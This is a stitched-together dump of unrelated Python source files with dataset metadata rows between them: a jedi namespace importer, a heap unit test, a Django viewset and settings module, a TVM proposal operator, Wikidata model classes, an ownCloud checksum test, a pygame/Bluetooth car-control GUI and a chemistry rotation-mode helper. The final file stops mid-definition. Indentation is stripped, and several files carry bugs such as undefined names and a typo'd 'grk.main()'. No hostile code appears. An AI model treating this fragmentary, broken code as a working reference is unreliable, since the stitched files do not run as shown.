class ObjectImporter(object):
"""
Import objects in "raw" namespace such as :func:`locals`.
"""
def __init__(self, scope):
self.scope = scope
count = itertools.count()
self._genname = lambda: '*jedi-%s*' % next(count)
"""
Generate unique variable names to avoid name collision.
To avoid name collision to already defined names, generated
names are invalid as Python identifier.
"""
def import_raw_namespace(self, raw_namespace):
"""
Import interpreted Python objects in a namespace.
Three kinds of objects are treated here.
1. Functions and classes. The objects imported like this::
from os.path import join
2. Modules. The objects imported like this::
import os
3. Instances. The objects created like this::
from datetime import datetime
dt = datetime(2013, 1, 1)
:type raw_namespace: dict
:arg raw_namespace: e.g., the dict given by `locals`
"""
scope = self.scope
for (variable, obj) in raw_namespace.items():
objname = getattr(obj, '__name__', None)
# Import functions and classes
module = getattr(obj, '__module__', None)
if module and objname:
fakeimport = self.make_fakeimport(module, objname, variable)
scope.add_import(fakeimport)
continue
# Import modules
if getattr(obj, '__file__', None) and objname:
fakeimport = self.make_fakeimport(objname)
scope.add_import(fakeimport)
continue
# Import instances
objclass = getattr(obj, '__class__', None)
module = getattr(objclass, '__module__', None)
if objclass and module:
alias = self._genname()
fakeimport = self.make_fakeimport(module, objclass.__name__,
alias)
fakestmt = self.make_fakestatement(variable, alias, call=True)
scope.add_import(fakeimport)
scope.add_statement(fakestmt)
continue
def make_fakeimport(self, module, variable=None, alias=None):
"""
Make a fake import object.
The following statements are created depending on what parameters
are given:
- only `module`: ``import <module>``
- `module` and `variable`: ``from <module> import <variable>``
- all: ``from <module> import <variable> as <alias>``
:type module: str
:arg module: ``<module>`` part in ``from <module> import ...``
:type variable: str
:arg variable: ``<variable>`` part in ``from ... import <variable>``
:type alias: str
:arg alias: ``<alias>`` part in ``... import ... as <alias>``.
:rtype: :class:`parsing_representation.Import`
"""
submodule = self.scope._sub_module
if variable:
varname = pr.Name(
module=submodule,
names=[(variable, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
else:
varname = None
modname = pr.Name(
module=submodule,
names=[(module, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
if alias:
aliasname = pr.Name(
module=submodule,
names=[(alias, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
else:
aliasname = None
if varname:
fakeimport = pr.Import(
module=submodule,
namespace=varname,
from_ns=modname,
alias=aliasname,
start_pos=(-1, 0),
end_pos=(None, None))
else:
fakeimport = pr.Import(
module=submodule,
namespace=modname,
alias=aliasname,
start_pos=(-1, 0),
end_pos=(None, None))
return fakeimport
def make_fakestatement(self, lhs, rhs, call=False):
"""
Make a fake statement object that represents ``lhs = rhs``.
:type call: bool
:arg call: When `call` is true, make a fake statement that represents
``lhs = rhs()``.
:rtype: :class:`parsing_representation.Statement`
"""
submodule = self.scope._sub_module
lhsname = pr.Name(
module=submodule,
names=[(lhs, (0, 0))],
start_pos=(0, 0),
end_pos=(None, None))
rhsname = pr.Name(
module=submodule,
names=[(rhs, (0, 0))],
start_pos=(0, 0),
end_pos=(None, None))
token_list = [lhsname, (tokenize.OP, '=', (0, 0)), rhsname]
if call:
token_list.extend([
(tokenize.OP, '(', (0, 0)),
(tokenize.OP, ')', (0, 0)),
])
return pr.Statement(
module=submodule,
set_vars=[lhsname],
used_vars=[rhsname],
token_list=token_list,
start_pos=(0, 0),
end_pos=(None, None))
| gpl-2.0 | -4,367,904,602,826,180,600 | 31.280702 | 78 | 0.502536 | false | 4.509804 | false | false | false |
joelliusp/SpaceHabit | SpaceHabitRPG/Tests/ForHelpers/Test_Heap.py | 1 | 2353 | from TestDummyObjectMaker import DailySortingTestObject
from SpaceUnitTest import SpaceUnitTest
from collections import OrderedDict
from Heap import Heap
import random
class Test_Heap(SpaceUnitTest):
def setUp(self):
self.testList = []
self.controlList = []
for i in range(0,500):
u = i // 100
r = (500 -i) // 25
f = i
tObj = DailySortingTestObject(u,r,f)
self.testList.append(tObj)
self.controlList.append(tObj)
random.shuffle(self.testList)
print("done")
return super().setUp()
def tearDown(self):
return super().tearDown()
def test_heap_basic_functions(self):
heap = Heap(lambda x,y: x > y)
self.assertTrue(heap.is_empty())
self.assertEqual(len(heap),0)
heap.push(5)
self.assertEqual(len(heap),1)
heap.push_list([3,8,1,4])
self.assertEqual(len(heap),5)
def test_heapsort(self):
heap1 = Heap(lambda x,y: x > y)
presorted = []
for i in range(0,1000):
randNum = random.randint(0,1000)
presorted.append(randNum)
heap1.push(randNum)
sorted = heap1.get_sorted_list()
prev = sorted[0]
for s in sorted:
self.assertTrue(s <= prev)
prev = s
presorted.sort()
self.assertTrue(heap1.is_empty())
for p in presorted:
heap1.push(p)
sorted1 = heap1.get_sorted_list()
prev = sorted1[0]
for s in sorted1:
self.assertTrue(s <= prev)
prev = s
presorted.reverse()
self.assertTrue(heap1.is_empty())
for p in presorted:
heap1.push(p)
sorted2 = heap1.get_sorted_list()
prev = sorted2[0]
for s in sorted2:
self.assertTrue(s <= prev)
prev = s
self.assertTrue(heap1.is_empty())
for i in range(0,1000):
heap1.push(random.randint(0,1000))
prev = heap1.pop()
for p in heap1.popper():
self.assertTrue(s <= prev)
prev = s
def test_multifield_heapsort(self):
heap = Heap(lambda a,b: a.daysUntilTrigger <= b.daysUntilTrigger
and a.urgency >= b.urgency and a.difficulty <= b.difficulty)
heap.push_list(self.testList)
for a,c in zip(heap.popper(),self.controlList):
self.assertEqual(a.daysUntilTrigger,c.daysUntilTrigger)
self.assertEqual(a.urgency,c.urgency)
self.assertEqual(a.difficulty,c.difficulty)
if __name__ == '__main__':
unittest.main()
| mit | -1,268,567,084,576,588,300 | 25.438202 | 70 | 0.632809 | false | 3.232143 | true | false | false |
Gimpneek/exclusive-raid-gym-tracker | app/views/view_sets/personalised_raids_view_set.py | 1 | 1052 | # pylint: disable=too-many-ancestors
""" View Set for personalised Gym api """
from rest_framework import viewsets
from app.models.profile import Profile
from app.models.raid_item import RaidItem
from app.serializers.raid_item import RaidItemSerializer
from app.views.view_sets.common import paginate_raids
class UserRaidsViewSet(viewsets.GenericViewSet):
"""
View Set for active raids on Gyms the logged in user is following
"""
serializer_class = RaidItemSerializer
def get_queryset(self):
""" Override the queryset """
profile = Profile.objects.get(user=self.request.user)
gyms = profile.tracked_gyms.all()
return RaidItem.objects.filter(gym__in=gyms).order_by('id')
def list(self, request):
"""
Define response for the listing of active raids on the user's
tracked gyms
:param request: Django Request
:return: Django Rest Framework Response
"""
queryset = self.get_queryset()
return paginate_raids(self, request, queryset)
| gpl-3.0 | 5,658,764,516,406,136,000 | 32.935484 | 69 | 0.692015 | false | 4 | false | false | false |
mlperf/training_results_v0.7 | Fujitsu/benchmarks/resnet/implementations/implementation_open/mxnet/3rdparty/tvm/topi/python/topi/vision/rcnn/proposal.py | 2 | 3693 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name
"""Proposal operator"""
import math
import tvm
def generate_anchor(ratio, scale, base_size):
"""Generate anchor"""
w = h = float(base_size)
x_ctr = 0.5 * (w - 1.)
y_ctr = 0.5 * (h - 1.)
size = w * h
size_ratios = math.floor(size / ratio)
new_w = math.floor(math.sqrt(size_ratios) + 0.5) * scale
new_h = math.floor((new_w / scale * ratio) + 0.5) * scale
return (x_ctr - 0.5 * (new_w - 1.0), y_ctr - 0.5 * (new_h - 1.0),
x_ctr + 0.5 * (new_w - 1.0), y_ctr + 0.5 * (new_h - 1.0))
def reg_bbox(x1, y1, x2, y2, dx, dy, dw, dh):
"""Bounding box regression function"""
bbox_w = x2 - x1 + 1.0
bbox_h = y2 - y1 + 1.0
ctr_x = x1 + 0.5 * (bbox_w - 1.0)
ctr_y = y1 + 0.5 * (bbox_h - 1.0)
pred_ctr_x = dx * bbox_w + ctr_x
pred_ctr_y = dy * bbox_h + ctr_y
pred_w = tvm.exp(dw) * bbox_w
pred_h = tvm.exp(dh) * bbox_h
pred_x1 = pred_ctr_x - 0.5 * (pred_w - 1.0)
pred_y1 = pred_ctr_y - 0.5 * (pred_h - 1.0)
pred_x2 = pred_ctr_x + 0.5 * (pred_w - 1.0)
pred_y2 = pred_ctr_y + 0.5 * (pred_h - 1.0)
return pred_x1, pred_y1, pred_x2, pred_y2
def reg_iou(x1, y1, x2, y2, dx1, dy1, dx2, dy2):
"""Bounding box regression function"""
pred_x1 = x1 + dx1
pred_y1 = y1 + dy1
pred_x2 = x2 + dx2
pred_y2 = y2 + dy2
return pred_x1, pred_y1, pred_x2, pred_y2
@tvm.target.generic_func
def proposal(cls_prob, bbox_pred, im_info, scales, ratios, feature_stride, threshold,
rpn_pre_nms_top_n, rpn_post_nms_top_n, rpn_min_size, iou_loss):
"""Proposal operator.
Parameters
----------
cls_prob : tvm.Tensor
4-D with shape [batch, 2 * num_anchors, height, width]
bbox_pred : tvm.Tensor
4-D with shape [batch, 4 * num_anchors, height, width]
im_info : tvm.Tensor
2-D with shape [batch, 3]
scales : list/tuple of float
Scales of anchor windoes.
ratios : list/tuple of float
Ratios of anchor windoes.
feature_stride : int
The size of the receptive field each unit in the convolution layer of the rpn, for example
the product of all stride's prior to this layer.
threshold : float
Non-maximum suppression threshold.
rpn_pre_nms_top_n : int
Number of top scoring boxes to apply NMS. -1 to use all boxes.
rpn_post_nms_top_n : int
Number of top scoring boxes to keep after applying NMS to RPN proposals.
rpn_min_size : int
Minimum height or width in proposal.
iou_loss : bool
Usage of IoU loss.
Returns
-------
out : tvm.Tensor
2-D tensor with shape [batch * rpn_post_nms_top_n, 5]. The last dimension is in format of
[batch_index, w_start, h_start, w_end, h_end].
"""
# pylint: disable=unused-argument
raise ValueError("missing register for topi.vision.rcnn.proposal")
| apache-2.0 | -6,410,807,795,262,336,000 | 31.973214 | 98 | 0.622258 | false | 2.995134 | false | false | false |
iago-suarez/ancoweb-TFG | src/ancoweb/settings.py | 1 | 4756 | """
Django settings for ancoweb project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
# Build paths inside the project like this: BASE_DIR / "directory"
from pathlib import Path
BASE_DIR = Path(__file__).resolve().parent.parent
TEMPLATE_DIRS = [str(BASE_DIR / 'templates'), ]
STATICFILES_DIRS = [str(BASE_DIR / 'static'), ]
# Use 12factor inspired environment variables or from a file
import environ
env = environ.Env()
# Ideally move env file should be outside the git repo
# i.e. BASE_DIR.parent.parent
env_file = BASE_DIR.parent / 'local.env'
if env_file.is_file():
environ.Env.read_env(str(env_file))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Raises ImproperlyConfigured exception if SECRET_KEY not in os.environ
SECRET_KEY = env('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Turn off debug while imported by Celery with a workaround
# See http://stackoverflow.com/a/4806384
import sys
if "celery" in sys.argv[0]:
DEBUG = False
# Application definition
INSTALLED_APPS = (
'django_admin_bootstrapped',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'accounts',
'video_manager',
'video_upload',
'crispy_forms',
'integration_tests',
'djangojs',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'ancoweb.urls'
WSGI_APPLICATION = 'ancoweb.wsgi.application'
# Database
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': str(BASE_DIR / 'db.sqlite3'),
'TEST_NAME': str(BASE_DIR / 'tests.sqlite3'),
'TEST': {
'NAME': str(BASE_DIR / 'tests.sqlite3')
}
}
}
# Internationalization
# https://docs.djangoproject.com/en/dev/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/dev/howto/static-files/
MEDIA_URL = '/media/'
MEDIA_ROOT = str(BASE_DIR / 'media/')
STATIC_URL = '/static/'
# Crispy Form Theme - Bootstrap 3
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# For Bootstrap 3, change error alert to 'danger'
from django.contrib import messages
MESSAGE_TAGS = {
messages.ERROR: 'danger'
}
# Progressbar settings
FILE_UPLOAD_HANDLERS = (
"video_upload.handlers.VideoUploadHandler",
"django.core.files.uploadhandler.MemoryFileUploadHandler",
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
PROGRESSBARUPLOAD_INCLUDE_JQUERY = False
# Custom Settings
DEFAULT_VIDEO_ICON = 'site/img/default-video-image.png'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
RECOGNITIONSYS_BIN = './RecognitionSystem/recognitionsystem'
USED_VIDEO_EXTENSIONS = ['.mp4', '.webm']
LOGIN_REDIRECT_URL = "/"
| apache-2.0 | -9,098,061,760,244,350,000 | 25.276243 | 75 | 0.691127 | false | 3.499632 | false | false | false |
DaniFdezAlvarez/wikidataExplorer | wikidata_exp/wdexp/model/wikidata.py | 1 | 7346 | __author__ = 'Dani'
class WikidataEntity(object):
def __init__(self, entity_id, label=None, description=None, aliases=None,
outcoming_properties_id=None, incoming_properties_id=None, pg_score=None):
self._id = entity_id
self._label = label
self._description = description
if aliases is None:
aliases = []
self._aliases = aliases
if outcoming_properties_id is None: # Dict with key (id_property) and id (number of times)
outcoming_properties_id = {}
self._out_prop = outcoming_properties_id
if incoming_properties_id is None:
incoming_properties_id = {}
self._in_prop = incoming_properties_id
self._pg_score = pg_score
def __str__(self):
return self._id
@property
def id(self):
return self._id
@property
def label(self):
return self._label
@property
def description(self):
return self._description
@property
def aliases(self):
for an_alias in self._aliases:
yield an_alias
@property
def n_aliases(self):
return len(self._aliases)
@property
def outcoming_properties_id(self):
for a_prop in self._out_prop:
for i in range(0, self._out_prop):
yield a_prop
@property
def n_outcoming_properties(self):
result = 0
for a_prop in self._out_prop:
result += self._out_prop[a_prop]
return result
@property
def distinct_outcoming_properties_id(self):
for a_prop in self._out_prop:
yield a_prop
@property
def n_distinct_outcoming_properties_id(self):
return len(self._out_prop)
@property
def incoming_properties_id(self):
for a_prop in self._in_prop:
for i in range(0, self._in_prop):
yield a_prop
@property
def n_incoming_properties(self):
result = 0
for a_prop in self._in_prop:
result += self._in_prop[a_prop]
return result
@property
def distinct_incoming_properties_id(self):
for a_prop in self._in_prop:
yield a_prop
@property
def n_distinct_incoming_properties_id(self):
return len(self._in_prop)
@property
def pg_score(self):
return self._pg_score
@pg_score.setter
def pg_score(self, value):
self._pg_score = value
def n_times_incoming_property(self, a_prop):
if a_prop in self._in_prop:
return self._in_prop[a_prop]
else:
return 0
def n_times_outcoming_prop(self, a_prop):
if a_prop in self._out_prop:
return self._out_prop[a_prop]
else:
return 0
class WikidataProperty(object):
def __init__(self, property_id, label=None, description=None, aliases=None, trends=None,
outcoming_properties_id=None, incoming_properties_id=None, n_appearances=None, rank=None):
self._id = property_id
self._label = label
self._description = description
if aliases is None:
aliases = []
self._aliases = aliases
if trends is None:
trends = []
self._trends = trends
if outcoming_properties_id is None: # Dict with key (id_property) and id (number of times)
outcoming_properties_id = {}
self._out_prop = outcoming_properties_id
if incoming_properties_id is None:
incoming_properties_id = {}
self._in_prop = incoming_properties_id
self._n_appearances = n_appearances
self._rank = rank
def __str__(self):
return self._id
@property
def id(self):
return self._id
@property
def label(self):
return self._label
@property
def description(self):
return self._description
@property
def aliases(self):
for an_alias in self._aliases:
yield an_alias
@property
def n_aliases(self):
return len(self._aliases)
@property
def trends(self):
for a_trend in self._trends:
yield a_trend
def add_trend(self, a_trend):
self._trends.append(a_trend)
@property
def n_trends(self):
return len(self._trends)
@property
def outcoming_properties_id(self):
for a_prop in self._out_prop:
for i in range(0, self._out_prop):
yield a_prop
@property
def n_outcoming_properties(self):
result = 0
for a_prop in self._out_prop:
result += self._out_prop[a_prop]
return result
@property
def distinct_outcoming_properties_id(self):
for a_prop in self._out_prop:
yield a_prop
@property
def n_distinct_outcoming_properties_id(self):
return len(self._out_prop)
@property
def incoming_properties_id(self):
for a_prop in self._in_prop:
for i in range(0, self._in_prop):
yield a_prop
@property
def n_incoming_properties(self):
result = 0
for a_prop in self._in_prop:
result += self._in_prop[a_prop]
return result
@property
def distinct_incoming_properties_id(self):
for a_prop in self._in_prop:
yield a_prop
@property
def n_distinct_incoming_properties_id(self):
return len(self._in_prop)
@property
def n_appearances(self):
return self._n_appearances
@n_appearances.setter
def n_appearances(self, value):
self._n_appearances = value
@property
def rank(self):
return self._rank
@rank.setter
def rank(self, value):
self._rank = value
def n_times_incoming_property(self, a_prop):
if a_prop in self._in_prop:
return self._in_prop[a_prop]
else:
return 0
def n_times_outcoming_prop(self, a_prop):
if a_prop in self._out_prop:
return self._out_prop[a_prop]
else:
return 0
##### LITERAL_TYPES
TYPE_UNKOWN = -1
TYPE_NUMBER = 0
TYPE_STRING = 1
class WikidataLiteral(object):
def __init__(self, value, literal_type=None):
self._value = value
self._type = literal_type
@property
def value(self):
return self._value
@property
def type(self):
return self._type
def __str__(self):
return str(self._value)
class WikidataTriple(object):
def __init__(self, subject, predicate, target_object):
self._subject = subject
self._predicate = predicate
self._object = target_object
@property
def subject(self):
return self._subject
@property
def predicate(self):
return self._predicate
@property
def object(self):
return self._object
def __str__(self):
return str(self.subject) + ", " + str(self._predicate) + ", " + str(self.object)
| gpl-2.0 | 977,541,087,363,265,300 | 22.006536 | 107 | 0.54887 | false | 3.97726 | false | false | false |
labkode/smashbox | protocol/test_protocol_file_checksum.py | 6 | 4068 | from smashbox.utilities import *
from smashbox.utilities.hash_files import *
from smashbox.protocol import chunk_file_upload, file_upload, file_download
import smashbox.protocol
import os
import os.path
@add_worker
def main(step):
d = make_workdir()
reset_owncloud_account()
URL = oc_webdav_url()
logger.info('*** 0. upload without the checksum (files should be accepted by the server)')
filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1))
filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3))
# upload the file without a checksum and then download it to get the checksum type used by the server
file_upload(filename1,URL)
chunk_file_upload(filename2,URL)
file_download(os.path.basename(filename1),URL,d)
r=file_download(os.path.basename(filename2),URL,d)
analyse_hashfiles(d) # make sure that files uploaded without a checksum are not corrupted
logger.info('Got checksum from the server: %s', r.headers['OC-Checksum'])
try:
active_server_checksum_type = r.headers['OC-Checksum'].strip().split(':')[0]
except KeyError,x:
logger.warning('Checksum not enabled for %s',oc_webdav_url(hide_password=True))
return
# now check the checksum type supported on the server
logger.info('Server supports %s checksum',repr(active_server_checksum_type))
smashbox.protocol.enable_checksum(active_server_checksum_type)
logger.info('*** 1. upload with correct checksum (files should be accepted by the server)')
filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1))
filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3))
file_upload(filename1,URL)
chunk_file_upload(filename2,URL)
file_download(os.path.basename(filename1),URL,d)
file_download(os.path.basename(filename2),URL,d)
analyse_hashfiles(d)
# pass around incorrect checksum (of the type supported by the server)
# the puts should be failing
def corrupted_checksum(fn):
c = smashbox.protocol.compute_checksum(fn)
c = c[:-1]+chr(ord(c[-1])+1)
return c
logger.info('*** 2. upload with corrupted checksum value (files should be refused by the server)')
filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1))
filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3))
r = file_upload(filename1,URL,checksum=corrupted_checksum(filename1))
fatal_check(r.rc == 412)
r = chunk_file_upload(filename2,URL,checksum=corrupted_checksum(filename2))
fatal_check(r.rc == 412)
# paranoia check: make sure that the server did not store the corrupted files inspite of returning 412
d_corrupted = mkdir(os.path.join(d,'corrupted_files'))
file_download(os.path.basename(filename1),URL,d_corrupted)
file_download(os.path.basename(filename2),URL,d_corrupted)
fatal_check(os.listdir(d_corrupted)==[])
# pass around a checksum of the type unsupported by the server, including some garbage types (which are not even well-formatted)
# in this case the checksums should be ignored and the files transmitted as if checksum was not provided at all
checksum_types = list(set(smashbox.protocol.known_checksum_types)-set([active_server_checksum_type]))
checksum_types += ['blabla']
logger.info('*** 3. upload with corrupted checksum types and strange values (files should be accepted by the server)')
for value in ['',':bah',':']:
for cstype in checksum_types:
smashbox.protocol.enable_checksum(cstype)
filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1))
filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3))
logger.info(' *** testing checkum value: '+cstype+value)
file_upload(filename1,URL,checksum=cstype+value)
chunk_file_upload(filename2,URL,checksum=cstype+value)
file_download(os.path.basename(filename1),URL,d)
file_download(os.path.basename(filename2),URL,d)
analyse_hashfiles(d)
| agpl-3.0 | 1,346,570,418,737,837,000 | 37.018692 | 132 | 0.69469 | false | 3.51599 | false | false | false |
henrybond158/Smart-Programming-Project | PiProgram2.py | 1 | 6190 | #!/usr/bin/python
import pygtk
import pygame
from pygame.locals import *
pygtk.require('2.0')
import gtk
import os
import wheel
import sys, select, tty, termios, bluetooth, time
from evdev import InputDevice, categorize, ecodes # Device Input
import threading
import gobject
#from lib import xbox_read # Controller Lib
# =====> GUI Class
class Base(gtk.Window):
def destroy(self, widget, data=None):
print('you closed the window')
gtk.main_quit()
def forward(self, widget, data=None):
print('you click the forward button')
def backwards(self, widget, data=None):
print('you clicked the back button')
def left(self, widget, data=None):
print('you clicked the left button')
def right(self, widget, data=None):
print('you clicked the right button')
def cruise(self, widget, data=None):
print("you be crusing")
def selection_changed(self, widget, data=None):
print ("keyboard selected")
def xboxController(self, widget, data=None):
print ("xbox selected")
def wheelController(self, widget, data=None):
print("wheel selected")
def selection_changed( self, w, data=None):
self.label.set_label( "Current selection: <b>%s</b>" % data)
def __init__(self):
super(Base, self).__init__()
if Car().test("00:12:05:09:94:45"):
print "[...]\033[92m Connection Successful \033[0m[...]"
else:
print "[...]\033[91m Connection Failed \033[0m [...]"
carClass = Car()
self.sock = carClass.connecting("00:12:05:09:94:45")
WINX = 300
WINY = 200
self.set_title("Car GUI")
self.set_size_request(WINX, WINY)
self.set_position(gtk.WIN_POS_CENTER)
self.set_resizable(False)
# Creating the buttons and other widgets
btn3Turn = gtk.Button("3-P Turn")
btnMenu = gtk.Button("Menu")
btnCruise = gtk.Button("Cruise")
btnSpazz = gtk.Button("Random")
btnStop = gtk.Button("STOP!!!")
self.progbar = gtk.ProgressBar()
self.progbar2 = gtk.ProgressBar()
frame = gtk.Frame("Car's Movement")
lblAction = gtk.Label("<b>The car is moving / action /</b>")
lblAction.set_justify(gtk.JUSTIFY_CENTER)
lblAction.set_size_request(235,60)
lblAction.set_use_markup(True)
frame.set_label_align(0.5,0.5)
frame.add(lblAction)
#setting size
btnSpazz.set_size_request(80,30)
btnCruise.set_size_request(80, 30)
btnMenu.set_size_request(80, 40)
btn3Turn.set_size_request(80, 30)
btnStop.set_size_request(80,30)
fixed = gtk.Fixed()
self.progbar.set_orientation(gtk.PROGRESS_BOTTOM_TO_TOP)
self.progbar2.set_orientation(gtk.PROGRESS_BOTTOM_TO_TOP)
fixed.put(frame, 30,10)
# positioning the widgets
fixed.put(btnCruise ,110 ,110)
fixed.put(btnSpazz ,210 ,110)
fixed.put(btnMenu ,10 , 110)
fixed.put(btn3Turn ,210 , 160)
fixed.put(btnStop,110, 160)
fixed.put(self.progbar,10, 10)
fixed.put(self.progbar2,275, 10)
self.add(fixed)
self.realize()
print 'gogogo'
self.connect("destroy", gtk.main_quit)
# Force SDL to write on our drawing area
os.putenv('SDL_WINDOWID', str(self.window.xid))
gtk.gdk.flush()
pygame.init()
pygame.display.set_mode((WINX,WINY),0,0)
screen = pygame.display.get_surface()
gobject.idle_add(pygame.display.update)
self.show_all()
# screen = pygame.display.get_surface()
# self.joystick = pygame.joystick.Joystick(0)
# self.joystick.init()
# wheelClass = wheel.WheelClass(self.joystick)
time.sleep(5)
print "Running keyboard thread"
KeyboardThread = carClass.keyboard()
# =====> Car Class
class Car:
x = 1
y = 1
last = 0
# screen = pygame.display.get_surface()
pygame.joystick.init()
joystick = pygame.joystick.Joystick(0)
# self.joystick.init()
print "Joystick initialized"
wheelClass = wheel.WheelClass(joystick)
#def __init__(self):
def moveX(self, st): self.x = st
def moveY(self, st): self.y = st
def move(self, spd):
arra = [[5,1,6], [3,0,4], [7,2,8]]
ch = (16 * arra[self.y][self.x]) + spd
if self.last != ch:
self.sock.send(chr(ch))
self.last = ch
def keyboard(self):
print "Keyboard"
# loop around each key press
while True:
# Starts pulling keyboard inputs from pygame
pygame.event.pump()
# Sets keyboard inputs to a variable
self.pressed = pygame.key.get_pressed()
# if either the up/down button is pressed, set the Y axes to
if self.pressed[K_UP]: self.moveY(0)
elif self.pressed[K_DOWN]: self.moveY(2)
else: self.moveY(1)
# if either the left/right button is pressed, set the X axes to
if self.pressed[K_LEFT]: self.moveX(0)
elif self.pressed[K_RIGHT]: self.moveX(2)
else: self.moveX(1)
# Will run the move function, move with set the X/Y vars and move the car accordingly
self.move(8)
# If the escape key is pressed, exit
if self.pressed[K_ESCAPE]: break
def controllerXbox(self):
# Will catch errors
try:
# loop around xbox events
for event in xbox_read.event_stream(deadzone=12000):
# if either the up/down button is pressed, set the Y axes to
if event.key == 'Y1' and event.value > 1: self.moveY(2)
elif event.key == 'Y1' and event.value < 1: self.moveY(0)
else: self.moveY(1)
# if either the left/right button is pressed, set the X axes to
if event.key == 'X1' and event.value > 1: self.moveX(2)
elif event.key == 'X1' and event.value < 1: self.moveX(0)
else: self.moveX(1)
move((int(event.value) /2200))
except:
print '[...] Error With Controller [...]'
def controllerPs3(self):
print '[...] Ps3 Controller [...]'
def wheelHandler(self):
while True:
direction,turning,speed=self.wheelClass.getMov()
self.y = direction
self.x = turning
self.move(speed)
def connecting(self,bdr_addr):
try:
self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
self.sock.connect((bdr_addr, 1))
return sock
except: return ''
def test(self,mac):
try:
testSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
testSock.connect((mac, 1))
testSock.close()
time.sleep(1)
return True
except:
return False
##### Accelerometer #####
def axelmeter(self, speed):
self.progbar.set_fraction(speed/11.0)
if __name__ == "__main__":
# cli_menu()
Base()
GUIthread = grk.main()
print "Starting GUI thread"
GUIthread.start()
GUIthread.join()
| gpl-2.0 | -8,124,626,648,320,981,000 | 24.265306 | 87 | 0.678998 | false | 2.784525 | false | false | false |
keldLundgaard/ase-anharmonics | define_rot_mode.py | 1 | 4665 | import numpy as np
from an_utils import to_massweight_coor
def get_rot_dict(atoms,
basepos,
branch,
symnumber=1,
indices=None,
rot_axis=None):
"""Define the rotational mode.
Get rotational axis, mode vector, and moment of inertia
"""
basepos_arr = np.array(basepos)
branch_arr = np.array(branch)
assert (np.all(branch_arr < atoms.get_number_of_atoms())), \
'\nBad branch - contains higher atom index than available'
# Finding rot axis
COM = atoms[branch].get_center_of_mass()
if rot_axis is None: # 'Guess' rotation axis
rot_axis_arr = basepos_arr-COM
else: # User specified rotation axis
rot_axis_arr = np.array(rot_axis)
axis_norm = np.linalg.norm(rot_axis_arr)
assert (not np.allclose(axis_norm, 0, 1e-5, 1e-7)), \
"""\nCould not determine rotation axis, length of axis vector is
Possible cause: center of mass is same as specified point"""
rot_axis_arr = rot_axis_arr/axis_norm
moment_of_intertia = get_moment_of_intertia(
atoms[branch], basepos, rot_axis_arr)
mode_tangent = calculate_rot_mode(
atoms, basepos_arr, rot_axis_arr, branch_arr)
# defining the normal mode only in the indices used for the
# vibrational analysis
if indices is not None:
mode_tangent = mode_tangent.reshape((-1, 3))[indices].ravel()
else:
indices = range(len(atoms))
mode_tangent_mass_weighted = to_massweight_coor(
mode_tangent, atoms, indices=indices)
return {
'type': 'rotation',
'symnumber': symnumber,
'base_pos': basepos_arr,
'branch': branch_arr,
'rot_axis': rot_axis_arr,
'mode_tangent': mode_tangent,
'mode_tangent_mass_weighted': mode_tangent_mass_weighted,
'inertia': moment_of_intertia,
'indices': indices, }
def get_moment_of_intertia(atoms, x0, r_rot):
